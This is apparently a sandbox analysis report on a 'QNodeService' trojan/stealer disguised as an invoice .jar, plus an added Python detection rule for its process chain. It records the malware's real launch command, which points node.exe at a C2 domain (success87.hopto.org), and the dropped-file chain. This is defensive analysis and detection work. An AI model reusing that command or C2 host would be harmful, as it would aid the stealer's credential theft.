Analysis
max time kernel: 128s
max time network: 152s
platform: windows10_x64
resource: win10
submitted: 21-10-2020 12:01
Static task: static1
Behavioral task: behavioral1
  Sample: INVOICE _1106.jar
  Resource: win7 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: INVOICE _1106.jar
  Resource: win10 (windows10_x64)
  0 signatures, 0 seconds
General
Target: INVOICE _1106.jar
Size: 72KB
MD5: 52894a1b1f752949a63e53561f076d62
SHA1: e05df8a4f5bc86a8f25cf4f20250cce1be5c251a
SHA256: 87b4f32c8efd777e1add156beb424abd9441e122c78e40ddf968b20824f1a0f1
SHA512: 309f1f89d325e12f55a72341bc62e19e75e6c820ea2c18a3b17687c44ef50750fc993a21dab8bf618531371b083a282be141230cde45e4a6e66c34674cd2f96b
Score: 10/10
Malware Config
Signatures
QNodeService
  Trojan/stealer written in NodeJS and spread via Java downloader.
Executes dropped EXE (1 IoC)
  pid   Process
  2148  node.exe
JavaScript code in executable (1 IoC)
  resource                                      yara_rule
  behavioral2/files/0x000100000001ad6c-175.dat  js
Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid   Process
  2148  node.exe
  2148  node.exe
  2148  node.exe
  2148  node.exe
Suspicious use of WriteProcessMemory (4 IoCs)
  description                        pid   Process    procid_target
  PID 3056 wrote to memory of 1668   3056  java.exe   76
  PID 3056 wrote to memory of 1668   3056  java.exe   76
  PID 1668 wrote to memory of 2148   1668  javaw.exe  78
  PID 1668 wrote to memory of 2148   1668  javaw.exe  78
Processes
1. C:\ProgramData\Oracle\Java\javapath\java.exe
   Command line: java -jar "C:\Users\Admin\AppData\Local\Temp\INVOICE _1106.jar"
   PID: 3056
   - Suspicious use of WriteProcessMemory
   2. C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      Command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\fbcdc658.tmp
      PID: 1668
      - Suspicious use of WriteProcessMemory
      3. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
         Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain success87.hopto.org
         PID: 2148
         - Executes dropped EXE
         - Suspicious behavior: EnumeratesProcesses
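The process tree is the whole behavioral signal this report records: the Java launcher runs the submitted jar, which re-launches javaw.exe on a dropped .tmp jar in %TEMP%, which starts a dropped node.exe out of the user profile with a lone "-" argument (node reads the script from stdin, so no .js lands on disk) and the C2 hub domain passed on the command line. The two WriteProcessMemory pairs line up exactly with the two parent-to-child launches in the tree. The Python below is an added example, not part of the sandbox's tooling or of the sample, and encodes those observations as a detection over constructed process-creation events. The event shape, the benign events, and the rule wording are assumptions; the image paths, the --hub-domain flag and the stdin argument are taken from the report.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation event (assumed shape, e.g. from Sysmon EID 1)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample events: the report's chain plus two benign look-alikes.
SAMPLE_EVENTS = [
    ProcEvent(3056, 1200, r"C:\ProgramData\Oracle\Java\javapath\java.exe",
              r'java -jar "C:\Users\Admin\AppData\Local\Temp\INVOICE _1106.jar"'),
    ProcEvent(1668, 3056, r"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe",
              r'"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar '
              r"C:\Users\Admin\AppData\Local\Temp\fbcdc658.tmp"),
    ProcEvent(2148, 1668, r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe",
              r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain success87.hopto.org"),
    # benign (constructed): developer running node from its normal install path
    ProcEvent(4100, 900, r"C:\Program Files\nodejs\node.exe",
              r'"C:\Program Files\nodejs\node.exe" build.js'),
    # benign (constructed): javaw started by an IDE, jar outside %TEMP%
    ProcEvent(4200, 950, r"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe",
              r"javaw.exe -jar C:\Tools\app.jar"),
]

JAVA_LAUNCHERS = {"java.exe", "javaw.exe"}
USER_PROFILE_RE = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\", re.IGNORECASE)
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# a stand-alone "-" token: node's "read the program from stdin" form
STDIN_SCRIPT_RE = re.compile(r"(^|\s)-(\s|$)")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return [(pid, [reasons...])] for events matching the QNodeService chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        reasons = []
        parent = by_pid.get(e.ppid)
        parent_is_java = parent is not None and basename(parent.image) in JAVA_LAUNCHERS
        image = basename(e.image)

        if image == "node.exe":
            if parent_is_java:
                reasons.append("node.exe spawned by Java launcher")
            if USER_PROFILE_RE.match(e.image):
                reasons.append("node.exe running from user profile")
            if "--hub-domain" in e.cmdline:
                reasons.append("QNodeService C2 argument --hub-domain")
            if STDIN_SCRIPT_RE.search(e.cmdline):
                reasons.append("script supplied on stdin")

        # second-stage jar: a Java launcher, itself a child of a Java launcher,
        # executing a file dropped in %TEMP%
        if image in JAVA_LAUNCHERS and parent_is_java and TEMP_DIR_RE.search(e.cmdline):
            reasons.append("java launcher re-executing a jar from %TEMP%")

        if reasons:
            findings.append((e.pid, reasons))
    return findings


if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS):
        print(pid, "->", "; ".join(reasons))
```

Each node.exe rule stands on its own so that the detection still fires if the sample is later rebuilt with a different hub domain or dropped to a different directory; only the --hub-domain check is specific to this family, the other three describe the delivery chain.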